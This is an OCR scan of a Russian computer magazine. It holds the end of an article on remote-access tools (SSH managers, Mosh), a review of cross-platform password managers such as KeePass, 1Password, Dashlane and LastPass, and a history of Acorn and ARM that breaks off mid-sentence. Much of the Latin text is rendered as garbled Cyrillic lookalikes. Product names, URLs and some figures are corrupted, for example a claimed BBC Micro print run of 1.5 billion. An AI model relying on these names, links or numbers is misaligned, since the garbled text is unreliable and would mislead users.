стро переключаться между машинами. 

Один изтаких менеджеров в Ипих — 
Споте Соппесйоп Мападег (Купи. 
сот/аст). Программа очень удобна, 
настоятельно рекомендуем. 

В \ММпао\м/$ для этой цели исполь- 
зуется АЩоРУТТ! — оболочка для по- 
пулярного Э5Н/Тета-клиента РитТУ\, 
скачать которую можно по адресу: м/м. 
гАои$.пе/аиторийу. Аналогичный ме- 
неджер 55Н-соединений есть и для О$ 
Х — ЗпиНе (п{рз://айпиЬ.сот/ И гем 
эп е). 

Для мобильных платформ можно ис- 
пользовать мобильные 5Э$Н-клиенты — 
Рготра (05) и СоппесВо\ (Апаго9). 
Ссылки и скриншоты ты без проблем 
найдешь в Сети. 


МОЗН (МОВШЕ 
УНЕШ.): ХОРОШАЯ 
АЛЬТЕРНАТИВА 
ДЛЯ 55Н 


Мозй (тозп.тий.еди) тоже можно ис- 
пользовать для удаленного доступа 

к консоли (то есть ты сможешь удаленно 
выполнять команды и будешь видеть 

их результат). Основное преимущество 
Мозй над 5ЗН — возможность роуминга, 
то есть смены сети на клиентской 
машине, что полезно в дороге, когда 
сеть может меняться (сейчас она со- 
товая, через несколько минут — \\/-[, 
при этом меняется 1Р но соединение 
остается). Часто путешествующие адми- 
ны оценят это по достоинству. Но есть 
один большой недостаток: к обычному 
55Н-серверу Моэй не подключится, 

то есть на сервере придется устанавли- 
вать Моз$п. Зато Мо$й работает не в виде 
демона, как ЗН, а как обычная про- 
грамма, то есть для ее запуска не нужен 
гоо{-доступ. МозП доступен для многих 
дистрибутивов Мпих и В$0, ОЗХ, 0$ 

(в составе популярного клиента 15$Н) 

и Апагога. 


пьютеру» и нажми «Применить». 

. Если используется энергосберегаю- 
щий режим, нужно настроить комп, 
чтобы он не уходил в спящий режим. 


| Разовшить позключаться тапьяо 2 кональнУмеСнЫй, На 
ее аа а ее 


ОЛЕНИ РОВ УИ: ЧЕЧЕНЦЫ ВН | ГПМЕО 


Выбунать гель обна НИ 


СООбЕЕ НАМОООТЗ: 
ШЕРИНГ ЭКРАНА 


| ется Еще одно средство 
й / | Сооде: Св 
третей ры И ВИДЕОКОНФЕРЕНЦИИ 


Как крайнюю меру можно исполь- 
зовать новый сервис от боо4е — 
Напдоцщ$ (аоое.сот/+Леагптоге/ 


папаоц1$/? ги). Он позволяет устра- 
ивать видеовстречи, во время которых 


пользователи могут демонстрировать 


му столу» для подключения к удаленному Рис. 15. Разрешение удаленного плагин для Спготе 
компу. доступа ( | 


ВМЕСТО ЗАКЛЮЧЕНИЯ 
$ Программ для удаленного доступа очень много. Как я, надеюсь, показал, самый привычный инструмент 
“`` не всегда самый эффективный. Нужно отталкиваться от условий конкретной задачи, целевых платформ друг другу свой экран. При желании 
Г 7 и других факторов. Надеюсь, теперь я окончательно прояснил всю картину удаленного доступа в твоей можешь ознакомиться с этим сервисом 
9 { голове. Все предложения и пожелания можешь отправлять на 2 самостоятельно. 


Обзор кросс-платформенных 
менеджеров паролей 


Если ты читаешь этот журнал, ты наверняка в кур- 
се базовых правил безопасности в Сети и следу- 
ешь им. Ты придумываешь для каждой учетной 
записи отдельный пароль и стараешься использо- 
вать максимально сложные комбинации. Уверен, 
ты уже давно работаешь с каким-нибудь менедже- 
ром паролей. Но и этого становится мало — ведь 
у тебя, скорее всего, куча компьютеров, браузеров 
и мобильных устройств. И после каждого громкого 
взлома ты бросаешься менять все что только мож- 
но. Как сделать свою жизнь чуточку проще? 


КЕЕРА$$ 


кеера$$.шЮ 
Чпих, Мас, \М/п / Апагоа, 05, М/п Рпопе 


Современный менеджер паролей — это уже 
не просто программа для хранения паролей в за- 
шифрованном виде. От такой программы требу- 
ется поддержка мобильных платформ, браузер- 
ные плагины, методы безопасной синхронизации 

пользовательских данных и многое другое. Са- 
мые продвинутые программы умеют, например, 
предупреждать пользователя о том, что где-то 
| что-то взломали и нужно поменять свой пароль. 
В общем, пространство для фантазии разработ- 
чиков огромно, и неудивительно, что некоторые 
из представленных в обзоре менеджеров успеш- 
но продаются за десятки долларов. 


КееРа$$ — ИШпих среди менеджеров паролей, опен- 

сорсный и буквально напичканный функциями. Офи- 

1 циальная реализация есть только под\ЛМтаом/$, но ис- 
ходники открыты под СРЁЬ\!2, поэтому есть огромное 
количество реализаций, в том числе под Шпих и под 
О$ Х, например КееРа$$Х. Также есть приложения 
и для мобильных ОС. Полный список неофициальных 
реализаций есть на странице проекта (кеераз$1пт0/ 
Чом/ипюаа.П1т1|). 

База данных паролей шифруется с помощью 
симметричного АЕЗ$-256, а мастер-пароль хеширует- 
ся с ЗНА-256. В качестве синхронизации обычно ис- 
пользуют либо старую добрую флешку, либо один из 
облачных сервисов, например ОгорБох. Некоторые 
мобильные клиенты, кстати, умеют с хранилищем 
в Огорбох работать автоматически. 

Для КееРа$$ есть куча плагинов и дополнитель- 
ных инструментов: утилиты для импорта/экспорта 
паролей из БД, браузерные плагины, позволяющие 

автоматом заполнять формы логина, и дополнитель- 
ные средства бэкапа и синхронизации. Все это со- 
брано на отдельной странице (Кеера$з$.пто/риа!й$. 
Ви). 

К сожалению, у такого зоопарка клиентов есть 
и минусы. Сейчас используется две версии (1 и 2) 
базы данных, несовместимых друг с другом. При 
этом есть клиенты, поддерживающие только одну 
из версий. Несмотря на то что основное приложение 
бесплатно, существуют и платные клиенты, напри- 
мер под 105. Как это часто бывает с подобными про- 
ектами, интерфейс у некоторых клиентов оставляет 

| желать лучшего. 
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Этот клиент от АдйеВиЕ$ уже заслужил популяр- 
ность у многих пользователей. Первое, с чем 
сталкиваешься при работе с ним, — неверо- 
ятно продуманный до мелочей и удобный ин- 
терфейс. При добавлении нового веб-сервиса 
программа автоматически скачивает его икон- 
ку и делает скриншот главной страницы. 

В комплекте с приложением также есть воз- 
можность установки браузерных 
клиентов. Они позволяют автома- 
тически добавлять новые паро- 
ли в базу (подобно встроенным 
в браузер функциям запоминания 
паролей), а также автозаполнения 
форм с логином. 

База данных, начиная с этого 
года, теперь зашифрована с АЕЗ- 
256. В качестве синхронизации 
доступны два варианта: Огорбох 


также удобный генератор безопасных паролей. 

Дополнительно можно отметить роцае- 
версию, написанную на $ и НТМЕ, которая 
работает в браузере. Подробней о ней на- 
писано на официальной странице (пер.аойе. 
м/5/1Разз\могаЗ/1разз\ммогаапумипеге. Пт). 

Поскольку разработчик пришел из мира 
Арре, есть свои нюансы. Например, высокая 
цена: десктопное приложение стоит около 50 
долларов. 

Под Шпих клиента нет вообще, а в Апагоа 
1РазмогА умеет только просматривать паро- 
ли, ане редактировать их или добавлять новые. 
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Зир — еще один интересный менеджер паро- 
лей от компании Гщейс. Простой и легковесный, 
при этом умеет все что нужно от менеджера па- 
ролей, но не более. Поддерживает платформы 
ММпао\м5 и О$ Х. В списке мобильных платформ: 
Апагога и 05. 

База данных паролей хранится в ЗОШе 
и шифруется АЕЗ-256 с помощью дополнения 
5ОЕСрпег (5а1српег.пе!). Синхронизация между 
клиентами происходит либо через облачное хра- 
нилище (на выбор: Соод!е Оиме или Огоррох), 
либо через \М-Е. 

Клиенты приложения платные, но цена (в от- 
личие от 1Раз$мога, например) вполне призем- 
ленная: мобильные клиенты стоят по 5 долларов, 
десктопные — по 10. 

Из явных минусов можно отметить, что на дан- 
ный момент нет возможности интеграции З{пр’а 
с браузерами для автоматического ввода паро- 
ля — весьма полезного функционала и защиты 
от кейлоггеров. Правда, авторы сообщают, что ра- 
бота над дополнениями идет полным ходом, так 
что через некоторое время можно ожидать полно- 
функциональный менеджер паролей. 

Также на форуме разработчиков упоминалось 
про планы запустить Ипих-приложение. 
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ОазМапе — довольно молодой менеджер паролей с ак- 
тивным желанием быть лучшим и самым безопасным 
среди себе подобных. И действительно, у него очень при- 
ятный интерфейс, поддержка различных операционок 
(ксожалению, Мпихтуттоже в пролете) и адекватная цена. 

Пароли в базе данных хранятся шифрованными АЕЗ- 
256. Есть возможность синхронизации через собственное 
дашлэйновское облако. Одна из самых классных фич — 
возможность использовать двухфакторную аутентифика- 
цию через Сооде Ащпепйса{ог, что позволяет повысить 
защищенность данных. Также есть всякие приятные ме- 
лочи, типа дашборда безопасности, в котором выводится 
сводная информация по паролям, или довольно строгие 
требования к мастер-паролю (разный регистр, цифры, 
минимум восемь символов). Есть также возможность веб- 
доступа к паролям. 

В стандартной поставке также присутствуют браузер- 
ные плагины, работающие привычным способом — по- 
зволяющие автоматически заполнять известные формы 
и сохранять результаты введенных паролей. 

Интересна также и ценовая политика компании. 
Во-первых, все устанавливаемые приложения бесплат- 
ны, а оплачиваются услуги пользования сервисом. Во- 
вторых, есть бесплатный тарифный план (без синхрони- 
зации, бэкапов и веб-доступа), а есть премиум, стоящий 
вполне адекватные 20 долларов в год. 

Из минусов можно отметить отсутствие полноценного 
клиента под Шпих и слегка раздражающий логотип в каж- 
дом поле ввода, которые добавляет браузерный плагин. 
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Примечательно, что у него, по сути, нет клиентского 
приложения. Весь функционал по управлению па- 
ролями реализован через веб-приложение и через 
браузерные плагины. Но, несмотря на это, сервис 
в плане функционала довольно мощный. Доступна 
возможность обмена паролями с друзьями. 

База данных с паролями шифруется с помощью 
АЕ$-256 и синхронизируется между хранилищем 
плагина и сервером [а${Раз$. Есть также роцаые- 
версии, причем как браузерных плагинов, так и са- 
мостоятельного приложения под \\ИпЧо\5$. 

Также стоит отметить, что родные приложе- 
ния есть для любой мобильной платформы (в том 
числе мероО$ или Зут ап). Более того, например, 
для Апаго@ есть как отдельное приложение, так 
и плагин для браузера Бори. \ 

В плане стоимости все просто, есть возмож- в 
ность бесплатного использования, есть дополни- 
тельные платные функции. Премиум-аккаунт стоит 
доллар в месяц или 12 долларов в год. 

Вообще, от сервиса остаются спорные ощуще- 
ния. С одной стороны, он довольно широко рас- \ 
пространен и есть возможность использовать его 
на всех мыслимых и немыслимых платформах. \ 
С другой стороны, сервис разрабатывался доволь- \ 
но давно и на сегодняшний день нет впечатления | 
лоска, присущего более молодым менеджерам па- А 
ролей. АА 


[а$1Ра$$ — довольно старый менеджер паролей. 
| 
|] 
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Мас, \Мп, Ипих / Апаго, 05, \ММп Рпопе 


Му1юдт — это стартап, чем-то похожий на 1а$Раз$, 
" но с прицелом на шаринг паролей. В основе лежит 
веб-приложение, с возможностью редактировать па- 
роли, а для сохранения их из форм и автоматического 
ь ввода существует яваскриптовый букмарклет. Основ- 
ной киллер-фичей менеджера паролей является груп- 
повая работа с паролями: есть возможность создавать 
несколько аккаунтов внутри организации, есть воз- 
можность управлять доступом различных лиц к опре- 
деленным паролям. Такой юзкейс подойдет в первую 
очередь небольшим группам, которые имеют внутри 
себя определенную базу реквизитов. В данном случае, 
например, после плановой смены пароля к опреде- 
ленному сервису отпадет необходимость в сообщении 
новых данных каждому пользователю. Это все-таки 
немного безопасней, чем хранить список где-нибудь 
в вики. Также стоит отметить интересную двухступен- 
чатую авторизацию. 

К сожалению, у данного проекта нет обширной ин- 
фраструктуры, присущей «взрослым» менеджерам па- 
ролей. Нет мобильных приложений, нет возможности 
работать с базой паролей офлайн. Браузерные плаги- 
ны также удобней букмарклета: они сами могут обнов- 
ляться и реализовывать более удобный интерфейс. 

Поэтому будем надеяться, что МуТодт найдет 
своего пользователя и сможет восполнить пробелы 
в сервисе. 
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Автор программы Вцераз$$ решил 
создать еще один менеджер па- 
ролей, скомбинировав при этом 
плюсы уже существующих решений 
и учтя их минусы: 

. открытые под СРИЫЗ исходники 
повысят доверие к менеджеру 
и помогут сформировать комью- 
нити разработчиков; 

. реализация на питоне, которая 
позволит сделать кросс-плат- 
форменное приложение для дес- 
ктопных клиентов; 

. мобильные приложения позво- 
лят работать с базой паролей 
без компьютера под рукой; 


. синхронизация через Р2Р по- 
зволит избежать затрат на со- 
держание «облаках и снизит 
вероятность массовой утечки 
реквизитов. 


Все это выглядит очень много- 
обещающе, если бы не одно «но»: 
пока большая часть функционала 
находится исключительно в планах. 
На данный момент есть неплохая 
реализация, работающая и син- 
хронизирующаяся под Мпих и ОЗ Х. 
Автор предлагает в лучших тради- 
циях краудфаундинга заинтересо- 
ванным пользователям скинуться 


деньгами, позволив ему посвятить 
проекту 100% рабочего времени. 
В качестве конечной цели установ- 
лена планка в 60 000 долларов (что, 
надо заметить, весьма немало). 
Весь проект выложен на гитхаб, 
поэтому за ходом разработки мож- 
но следить. Справедливости ради 
надо заметить, что темпы разра- 
ботки на данный момент вряд ли 
можно назвать вдохновляющими. 

В любом случае заявленный 
функционал выглядит — достаточ- 
НО «вкусно», поэтому имеет смысл 
к данному менеджеру паролей при- 
смотреться повнимательней. 


52 Сцена 
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Маленькая британская компания, подарившая 
миру мобильную революцию 


Новый фаворит в гонке процессорных вооружений — фирма не из Кремниевой 


долины, а из английского научного городка Кембридж. Однако ее успех — вещь ы 
вовсе не внезапная, и за ним стоит история длиной в тридцать лет. 


око бок с 1 мы живем еще с вось- 
мидесятых годов — имя этой компа- 
нии встречается в новостях так часто, 
что название нынешнего поколения 
ее процессоров нередко известно 
даже далеким от техники людям. Но времена 
изменились, и планшеты со смартфонами стали 
потихоньку отбирать внимание и пользователей 
уперсоналок, а отливают их ядра вовсе не на фа- 
бриках Ите!. На передний план внезапно вышла 
британская компания АНМ, о которой до недав- 
них пор слышали лишь специалисты. Что залюди 
стоят за созданием процессоров, давших дорогу 
новому поколению компьютеров? 

Формально фирма АВМ Ноатоа$ была соз- 
дана в 1990 году, а конкретнее — в тот момент, 


когда было подписано соглашение между тремя 
компаниями: Арре Сотрщег, Асот Сотрщег$ 
и \Ё $1 Тесппоюоду. Арре в представлении не нуж- 
дается, а вот об Асогт и МЗ стоит поговорить 
подробнее. 


КЕМБРИДЖСКИЙ ЖЕЛУДЬ 

История Асогт связана с другой известной бри- 
танской компанией — Этсат Везеагсй, где был 
создан небезызвестный компьютер 2Х Зресгит. 
Будущий сооснователь Асогпт Крис Карри сделал 
свою карьеру именно в Этсат ВаЧютс$ (позд- 
нее — Везеагсп). В те времена Карри и Синклер 
были друзьями и вместе работали над кар- 
манным калькулятором и другими проектами, 
но в 1978 году во время подготовки прототипа 


Андрей Письменный 


2Х80 (одного из предшественников 2Х Зрегит) 
они так сильно разошлись во мнениях относи- 
тельно будущего компьютера, что Карри поки- 
нул Синклера и его компанию. А вскоре основал 
собственную — совместно с предпринимателем, 
изобретателем и инвестором Германом Хаузе- 
ром. Фирма называлась Сатбпаде Ргосе$$ог 
Цпй, или просто СРЦ. 

Хаузер к тому времени уже успел завербовать 
одного гениального студента Кембриджского 
университета — Роджера Уилсона. Тот был бук- 
вально влюблен в электронику, на память цитиро- 
вал справочники компонентов и писал программы 
в машинных кодах без единой ошибки — по край- 
ней мере такова легенда. Опыт настоящей работы 
у Уилсона был небольшой — за ним числилось 
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Герман Хаузер иКрис Карри назаре Асогпт 


разве что создание автоматизированной кор- 
мушки для коров на основе чипа МО$ Тесппооду 
6502. Но когда Хаузер предложил Уилсону поуча- 
ствовать в создании электронной записной книж- 
ки (которая так потом и не появилась на свет), тот 
немедленно согласился. 

Карри привел с собой в новую фирму еще од- 
ного студента Кембриджа — второкурсника Сти- 
ва Фербера. Фербер, как и Карри, ранее работал 
на Синклера и занимался разработкой набора 
МК14, из которого любой желающий мог собрать 
простенький домашний компьютер. Первое вре- 
мя Ферберу приходилось совмещать работу 
в СРУ с учебой, но зато у него не было никаких 
сомнений в том, что после получения диплома 
он сможет продолжать заниматься любимым де- 
лом — придумывать компьютеры. 

В 1979 году СРУ был переименован в Асогп 
(что переводится как «желудь»), якобы чтобы 
числиться в телефонном справочнике до Арре. 
Но самое главное — фирма в тот год выпустила 
свой первый продукт, Асогп Зучет 1. Это был 
очень скромный компьютер для научных расче- 
тов, имевший однострочный ЖК-дисплей и про- 
дававшийся за 80 фунтов стерлингов. Для срав- 
нения, 7Х80, тоже считавшийся экстремально 
дешевым, в сборе стоил сотню. 

Настоящий успех ждал Асогп двумя годами 
позже, когда совместно с ВВС (да-да, той самой 
Британской широковещательной корпорацией, 
что по сей день снабжает весь мир своими ново- 
стями и сериалом «Доктор Кто») Карри и Хаузеру 
удалось выиграть тендер на поставки компью- 
теров в британские школы, — так родился ВВС 
Мсго. Клайв Синклер тоже участвовал в тендере 
и был настолько взбешен поражением, что напал 
на своего бывшего друга и коллегу Криса Карри 
в одном из кембриджских пабов и отхлестал его 
свернутой в трубочку газетой. 


СВЕРХБОЛЬШИЕ ИНТЕГРАЛЬНЫЕ 
СХЕМЫ 
В то время как индустрия переживала бум до- 
машних компьютеров, в научной части отрасли 
происходили другие, не менее захватывающие 
события. Одно из них имеет непосредственное 
отношение к появлению АНМ. 

Общеизвестно, что интернет был приду- 
ман в Агентстве по перспективным оборон- 
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Асогп Зузет 1 выглядел очень скромно — не сразу скажешь, что это компьютер 


ным научно-исследовательским разработкам 
США (РВАВРА), однако это не единственный про- 
ект ОАВРА, оказавший мощное влияние на всю 
индустрию. МЗ! Рго]ес{ как раз изтаких разрабо- 
ток: его относительно малая известность просто 
несоизмерима с его важностью. МЗ! расшиф- 
ровывается как \егу-агде-5сае ищедгайоп — 
сверхбольшая интегральная схема, или СБИС. 
В начале восьмидесятых все шло к переходу 
на такие схемы, но при их разработке инженеры 
столкнулись с серьезными проблемами. 

С ростом числа транзисторов, умещающихся 
на кристалле интегральной схемы, проектировать 
процессоры становилось все сложнее, и, когда 
число транзисторов стало превышать сотню ты- 
сяч, старые методы начали приводить к появле- 
нию ошибок. Требовался новый способ проекти- 
рования, и вряд ли кого-то удивит, что решение 
заключалось в использовании компьютера. 

Профессор Калифорнийского технологи- 
ческого института Карвер Мид и программист 
из лаборатории Хегох РАВАС Лин Конвей пред- 
ложили создать систему автоматизированного 
проектирования (САПР), которая бы помогала 
делать процессоры фактически любой слож- 
ности. На тот момент для работы с такой про- 
граммой понадобился бы суперкомпьютер, так 
что ВААРА пришлось профинансировать не толь- 
ко создание САПР, но и все вокруг: разработку 
рабочих станций и даже операционной систе- 
мы. Позднее из этих проектов вырастут фирмы 
ип Мегожуетз и ЭШсоп Сгартс$, а в качестве 
ОС будет создана новая ветвь УМХ — Вегмеу 
зоИ\маге Оизибийюопт(В$О). 

Мид и Конвей полагали, что если разработ- 
ка процессоров будет лучше автоматизирова- 
на, то делать их смогут небольшие фирмы или 
даже студенты в ходе обучения. Идея оказалась 
не только верной, но и очень удачной: с помощью 
новых инструментов процессоры стало намного 
легче проектировать и появилась возможность 
делать это в отрыве от производства. Мало того, 
новый софт позволил выявить доселе скрытые 
особенности строения процессоров. 


В1$С — БЛАГОРОДНОЕ ДЕЛО 

Современные процессорные архитектуры приня- 
то делить на два класса: С1$С (Сотр!ех п$гисйоп 
Зе Сотрийпа — вычислители с комплексным на- 


бором команд) и РЗС (Ведисеяа тугисйоп Зе 
Сотри!па — вычислители с сокращенным набо- 
ром команд). Между этими подходами есть прин- 
ципиальная разница, но появилась она не сразу. 

Ранние восьмибитные процессоры вроде 
пе! 8080 или Мотогоа 6800 умели исполнять 
всего несколько простых инструкций. Например, 
не было специальной инструкции для перемно- 
жения чисел, это действие требовало нескольких 
процессорных команд — смещений и сложений. 
Такой подход кажется неудобным, и потому ре- 
шение добавить более емкие инструкции было 
интуитивным. 

Считалось к тому же, что операции, вопло- 
щенные непосредственно в железе, будут ис- 
полняться намного быстрее, чем выполненные 
в виде программ. Так что в последующих раз- 
работках создатели процессоров стали добав- 
лять поддержку все новых и новых инструкций. 
Перемножение двух чисел, к примеру, превра- 
тилось в одну команду, зато устройство микро- 
схемы усложнилось, поскольку стало включать 
в себя отдельную подсистему, предназначен- 
ную для умножения. Так появились процессоры 
с комплексным набором команд. К этому семей- 
ству относятся и последующие чипы \е|, и дру- 
гие процессоры, пользовавшиеся популярно- 
стью в 80-е годы. 

Не сказать, что у комплексного набора ко- 
манд нет своих достоинств, но за них пришлось 
заплатить хорошую цену. Если первые процес- 
соры за один тик генератора тактовой частоты 
выполняли одну простую инструкцию, то более 
сложные инструкции стали требовать по не- 
сколько тактов. 

В рамках все того же проекта \1$! профессор 
Калифорнийского университета в Беркли Дэвид 
Паттерсон провел исследование, в ходе которо- 
го нащупал иной подход к процессоростроению, 
который он назвал ЕР$С. Выяснилось, что если 
ограничить набор инструкций лишь теми, которые 
могут быть исполнены за один такт, то можно уве- 
личить скорость их исполнения и таким образом 
повысить общую производительность. Житейская 
логика подсказывает, что такого быть не должно: 
программы ведь получаются длиннее! Но когда 
речь идет о системах из сотен тысяч компонентов, 
житейская логика может отдохнуть, а верный от- 
вет дадут моделирование и симуляция. 
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Заодно Паттерсону удалось значительно 
снизить влияние «бутылочного горлышка» фон- 
неймановской архитектуры — медленного кана- 
ла между процессором и оперативной памятью. 
В!$С отличается большим числом регистров, чем 
С5$С, и это позволяет реже обращаться к опера- 
тивной памяти — в особенности если программа 
пропущена через оптимизирующий компилятор 
и выгодно использует ресурсы. Еще лучше такой 
подход работает в многоядерных или многопро- 
цессорных системах, где к одной и той же памяти 
обращаются несколько вычислителей. Чем реже 
они это делают, тем реже каждому из них прихо- 
дится ждать своей очереди и, соответственно, 
тем больше прирост производительности. 


ПО ЗАКОНУ «АРХИМЕДА» 

Вернемся, однако, к истории Асогп. Если не счи- 
тать нелепой ссоры с отцом 7Х Зрегит, дела 
у компании в 1983 году шли неплохо: ВВС Мсго 
был продан полуторамиллиардным тиражом, 
и прибыль Асогп подскочила с трех тысяч фун- 
тов до почти девяти миллионов. Билл Гейтс даже 
предлагал Хаузеру портировать М$-ВО$ и фир- 
менный интерпретатор ВАЗС на ВВС Мсго, 
но Хаузер отказался. 

Команда собственных разработчиков Асогп 
росла, а учредители подумывали о том, что пора 
перейти на новый виток развития: вместо ком- 
пьютеров на основе восьмиразрядных чипов 
выпускать машины помощнее — с шестнадцати- 
разрядными ЦП. 

В качестве варианта рассматривались про- 
цессоры Майопа! Зетюкопаи ог, но Роберт 
Уилсон посетил израильскую штаб-квартиру 
этой компании и остался недоволен: «У них там 
над чипом работает по сто человек, и все равно 
то и дело ошибки». Следом Уилсон отправился 
в американскую фирму \Мезет Везап Сещег, 
где увидел ровно противоположенную картину: 
процессоры разрабатывали небольшие группы 
инженеров, причем почти что в домашних усло- 


виях. Уилсон задался вопросом: а нужно ли по- 
купать чужой процессор, если можно сделать 
собственный? Пример \М/ОС показывал, что это 
не так сложно, как может показаться. 

Идею в Асот приняли благосклонно, и рабо- 
та закипела. Уилсон придумал набор инструк- 
ций, а Фербер с небольшой командой разрабо- 
тал архитектуру будущего процессора. Именно 
тогда было принято судьбоносное решение ис- 
пользовать новомодный принцип Н$С. 

Первый в истории процессор АВМ (Асогп 
В$С Маспте) был выпущен в 1985 году, но ком- 
пьютера на его основе так и не появилось. 
Его продавали в качестве дополнения к ВВС 
Маег — у этой продвинутой версии ВВС Мсго 
был специальный интерфейс для подключения 
сопроцессоров. В комплект также входил набор 
для разработки программ для Р$С. 

Следующую инкарнацию процессора — 
АВМ2 ждала куда более интересная судьба: 
он лег в основу уникальной машины под назва- 
нием Агстеде$, впервые поступившей в про- 
дажу в 1987 году. ААМ2 имел 32-разрядную 
архитектуру, а адресная шина поддерживала 
26 разрядов, и таким образом могло быть адре- 
совано до 64 Мб оперативной памяти (огромное 
пространство по тем временам и несерьезное 
по нынешним). Частота ААМ2 сейчас тоже вряд 
ли кого-нибудь поразит, да и 1985 году 8 МГц 
можно было считать средним показателем. Вы- 
шедший примерно в то же время че! 80368 ра- 
ботал на вдвое большей частоте, но это не зна- 
чит, что вдвое эффективнее. 386-й выдавал лишь 
на миллион операций больше — пять против че- 
тыреху ААМ2. Вот оно, преимущество НВ!$С! 

Агсутедез стоил приличных денег — 
от 800 фунтов стерлингов (с учетом инфляции 
и впересчете на сегодняшние рубли получилось 
бы не меньше ста тысяч), но пользовался опре- 
деленной популярностью благодаря мощности, 
хорошему видеоадаптеру (режимы до 256 цве- 
тов) и восьмиканальной звуковой карте. По сути, 
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это был этакий британский Масшто$Н — рабочая 
станция для издательств и телестудий. 


ИМПЕРИЯ ОЦУЕТТ! 

Хоть Агспитедез$ и выпускался под маркой Асогп, 
компания к тому времени уже не была частным 
бизнесом Хаузера и Карри. За успешным 1983 
годом последовал ужасный 1984-й, когда ры- 
нок домашних компьютеров перенасытился. 
Это имело трагические последствия для многих 
игроков: Дай и Сотто@4оге сменили хозяев, 
ав Арре (в первый раз) столкнулись с перспек- 
тивой банкротства. 

В Асот к этой альфа-версии краха доткомов 
тоже не были готовы: компания только-только 
вышла на биржу, и заработанных на этом денег 
стало достаточно, чтобы удовлетворить непре- 
рывно росший до того момента спрос. В резуль- 
тате на складах Асогп скопилось 250 тысяч ком- 
пьютеров, продать которые внезапно оказалось 
нереально. 

И туг на горизонте появилась итальянская 
фирма О!ме!ш. Ее руководство уже и раньше 
предпринимало попытки перейти от производ- 
ства пишущих машинок к компьютерам. С кон- 
вейеров О!ме с 1983 по 1985 год сходили мо- 
дели на основе 71од 28000 и пе! 8088. Но АВМ, 
Агспитеаез и его операционная система Е!$С О$ 
в глазах менеджеров ОМе были лакомым ку- 
сочком. Иметь собственные технологии всегда 
лучше — по крайней мере в то время так каза- 
ЛОСЬ. 

Вскоре была заключена сделка, в результате 
которой к ОМей перешло 80 процентов акций 
Асогпт, а Герман Хаузер стал руководителем ис- 
следовательского подразделения. Второй ос- 
нователь Асогп Крис Карри, получив дивиденды 
от продажи, предпочел основать новую компа- 
нию — Сепега! шТтоптаНоп Зу$етз. Она до сих 
пор функционирует и занимается смарт- 
картами, электронными денежными переводами 
и системами безопасности. 
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Штаб-квартира ААМ в Кембридже 


Итальянцы, правда, тоже просчитались: 
в конце 80-х годов началось победное шествие 
|ВМ РС и его клонов. Стало понятно, что все не- 
совместимое с РС скоро окажется на свалке 
истории, и компании вместо того, чтобы взра- 
щивать свои технологии, массово переходили 
на сборку компьютеров из готовых компонентов. 
Тогдашние действия ОЕ можно сравнить с НР, 
три года назад купившей Ра!т, чтобы затем отка- 
заться от него и перейти на вездесущий Апаго. 

Хаузер тоже не был горд тем, что продал свою 
компанию. В одном из интервью он сетует: мож- 
но было поступить, как |1ВМ, — дать возможность 
сторонним фирмам производить компоненты 
и собирать компьютеры. И тогда, возможно, 
Асогпт и АВМ, ане 1ВМ и те оказались бы в цен- 
тре новой индустрии. Но нужное решение во- 
время принято не было, и стать британским 1ВМ 
фирме Асогп было не суждено. Зато у Хаузера 
имелся запасной план. 


БРАТСТВО «ПРОЦА» 

То, что в Ома! отказались от идеи развивать 
собственную компьютерную платформу, вовсе 
не означало погибель для АВМ. Хаузер изыскал 
способ выделить процессорный бизнес в отдель- 
ную компанию и нашел двух заинтересованных 
в этом партнеров. Объединенное предприятие 
назвали так же, как и архитектуру процессора, — 
ААМ, но расшифровку сменили с Асот Н$С 
Маспте$ на Адуапсеа Е!ЗС Маспте$з. 

Кому в тот момент могло понадобиться пар- 
тнерство с разработчиком процессоров ЕР$С? 
Очевидно, фирме, выпускающей устройства 
на их основе. Ей стала Арре: там в 1990 году 
как раз проектировали будущий наладонник 
Мемдоп, и процессор ААМ отлично годился 
для него благодаря своей экономичности по от- 
ношению к заряду батареи. 

В качестве третьего партнера была выбрана 
фирма \МЕЗ! Тесппооч!ез$. Это прямая наследни- 
ца \1$! Ргоес+, которая занималась проектиро- 


Как начинался АВМ 
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ванием и производством интегральных микро- 
схем. Для будущего предприятия было важно то, 
что \Е$! могла предоставить собственную систе- 
му автоматизированного проектирования. 

Самой же \МЁ$ был нужен новый заказчик 
процессоров. Это в чистом виде воплощение 
идеи Конвея и Мида, когда разработчик и про- 
изводитель СБИС работают раздельно (а в дан- 
ном случае даже находятся по разные стороны 
Атлантического океана). Наученный неудачей 
Асогп, Хаузер внес еще одну коррективу: вместо 
того, чтобы выпускать сам продукт, он предло- 
жил заниматься исключительно проектировани- 
ем процессоров и продавать интеллектуальную 
собственность — то есть дизайны микросхем 
и лицензии на их производство. 

Если Ш знаменита тем, что имеет десятки 
заводов по всему миру, то у АНМ нет ни одного. 
Это не помешало сегодняшней ААМ не только 
встать в один ряд с те и АМО, но и потихоньку 
превратиться в серьезную угрозу для них. 


НОВАЯ ЖИЗНЬАВМ 

Бурный рост продаж клонов 1ВМ РС в 90-е годы 
сказался на популярности Е$С не лучшим обра- 
зом. Там, где стали заправлять те! и Мсгоз$о8, 
альтернативы процессорам семейства х86 фак- 
тически не было. Зато оставались профессио- 
нальные применения: серверы и рабочие стан- 
ции 1ВМ и Зип Мсгозуетз, где используются 
«рисковые» архитектуры РомегРС и ЗРАВС соот- 
ветственно, а также рынок микроконтроллеров, 
долго служивший для АНАМ главной статьей до- 
хода. 

Первым процессором, дизайн которого вы- 
пустили в АВМ Нотоа$ после отсоединения 
от Асогп, стал ААМб, разработанный специаль- 
но для наладонника МемЙоп и в сотрудничестве 
с Арре. Впервые спецификация ААМб была вы- 
пущена в 1992 году, ав 1993-м компания объяви- 
ла о первых прибылях. 

С тех пор рост и совершенствование архи- 
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ВВС М!сго в Англии 
известен неменьше, 
чем 2Х Зресгит 


Схема одного из первых процессоров В!$С 


тектуры ААМ не прекращались, а в 1998 году 
компания успешно вышла на биржу. Тогда же, 
кстати, Арр!е продала свою часть акций: для нее 
это был год тяжелого кризиса, и отказ от доли 
в ААМ помог из него выбраться. Мог ли тогда 
Стив Джобс предположить, насколько важной 
для Арр/е окажется продукция АВМ через десять 
лет? 

Среди клиентов ААМ на сегодняшний день 
числится больше четырех десятков крупных про- 
изводителей электроники. Процессоры на ос- 
нове дизайнов ААМ можно обнаружить в самых 
разных устройствах — от жестких дисков до ав- 
томобилей и от игровых приставок до фото- и ви- 
деокамер и телевизоров. Даже в те! одно время 
выпускали процессоры на основе АВМ (серия 
называлась ХЗсае, но в 2006 году была продана 
вместе с подразделением). 

Однако самую болышую славу ААМ принесло 
